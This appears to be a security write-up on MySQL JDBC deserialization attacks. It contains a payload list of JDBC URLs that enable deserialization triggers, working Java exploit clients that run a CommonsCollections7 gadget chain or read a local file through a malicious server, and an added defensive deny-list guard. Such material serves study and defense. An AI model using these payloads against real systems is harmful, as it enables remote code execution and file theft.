Vulnerability principle
For setting up a malicious MySQL server, refer to:
Summary of payloads
ServerStatusDiffInterceptor trigger point
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
Where the property name differs, queryInterceptors is replaced by statementInterceptors:
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
detectCustomCollations trigger point
jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true
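As an added defensive example (not code from the original post or the referenced write-ups), the following Java guard scans a MySQL JDBC URL for the connection properties listed above and reports any it finds, so an application can refuse the URL before it ever reaches DriverManager.getConnection. The class name JdbcUrlGuard, the deny-list and the benign sample URL are my own choices.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;

public final class JdbcUrlGuard {
    // Connection properties from the payload list above that switch on the deserialization
    // trigger paths. The deny-list is an assumption of this example, not a driver feature.
    private static final Set<String> DENIED = Set.of(
            "autodeserialize", "queryinterceptors", "statementinterceptors", "detectcustomcollations");

    /** Returns the denied property names present in the URL's query string; empty means acceptable. */
    public static List<String> findDeniedProperties(String jdbcUrl) {
        List<String> hits = new ArrayList<>();
        if (jdbcUrl == null || !jdbcUrl.toLowerCase(Locale.ROOT).startsWith("jdbc:mysql:")) {
            return hits;
        }
        int q = jdbcUrl.indexOf('?');
        if (q < 0) {
            return hits; // no query string, so none of the properties can be set here
        }
        for (String pair : jdbcUrl.substring(q + 1).split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            // Decode and lower-case so that an encoded or differently cased spelling is still caught.
            key = URLDecoder.decode(key, StandardCharsets.UTF_8).trim().toLowerCase(Locale.ROOT);
            if (DENIED.contains(key)) {
                hits.add(key);
            }
        }
        return hits;
    }

    /** Convenience wrapper for call sites that want a hard failure instead of a list. */
    public static String requireSafe(String jdbcUrl) {
        List<String> hits = findDeniedProperties(jdbcUrl);
        if (!hits.isEmpty()) {
            throw new IllegalArgumentException("JDBC URL enables denied properties: " + hits);
        }
        return jdbcUrl;
    }

    public static void main(String[] args) {
        String[] samples = {
            "jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
            "jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true",
            "jdbc:mysql://db.internal:3306/app?useSSL=true&serverTimezone=UTC" // constructed benign URL
        };
        for (String s : samples) {
            System.out.println(findDeniedProperties(s) + "  <- " + s);
        }
    }
}
```

The same properties can also arrive through the java.util.Properties object passed to getConnection, so the Properties keys need the same check; a URL-only guard does not cover that path.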
Exploitation
import java.sql.Connection;
import java.sql.DriverManager;

public class Jdbctest {
    public static void main(String[] args) throws Exception {
        Class.forName("com.mysql.jdbc.Driver");
        String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
        // The username is the part to adjust: "yso" selects the deserialization module,
        // "CommonsCollections7" selects the CC7 gadget chain, and "calc" is the command argument for the chain.
        Connection con = DriverManager.getConnection(jdbc_url, "yso_CommonsCollections7_calc", "root");
    }
}
import java.sql.Connection;
import java.sql.DriverManager;

public class Jdbctest {
    public static void main(String[] args) throws Exception {
        Class.forName("com.mysql.jdbc.Driver");
        String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
        // Same setup; the username now carries a "fileread_" prefix followed by a file path.
        Connection con = DriverManager.getConnection(jdbc_url, "fileread_c:\\windows\\system32\\drivers\\etc\\hosts", "root");
    }
}
References:
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#JDBC%E7%AE%80%E4%BB%8B
https://c014.cn/blog/java/JDBC/MySQL%20JDBC%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html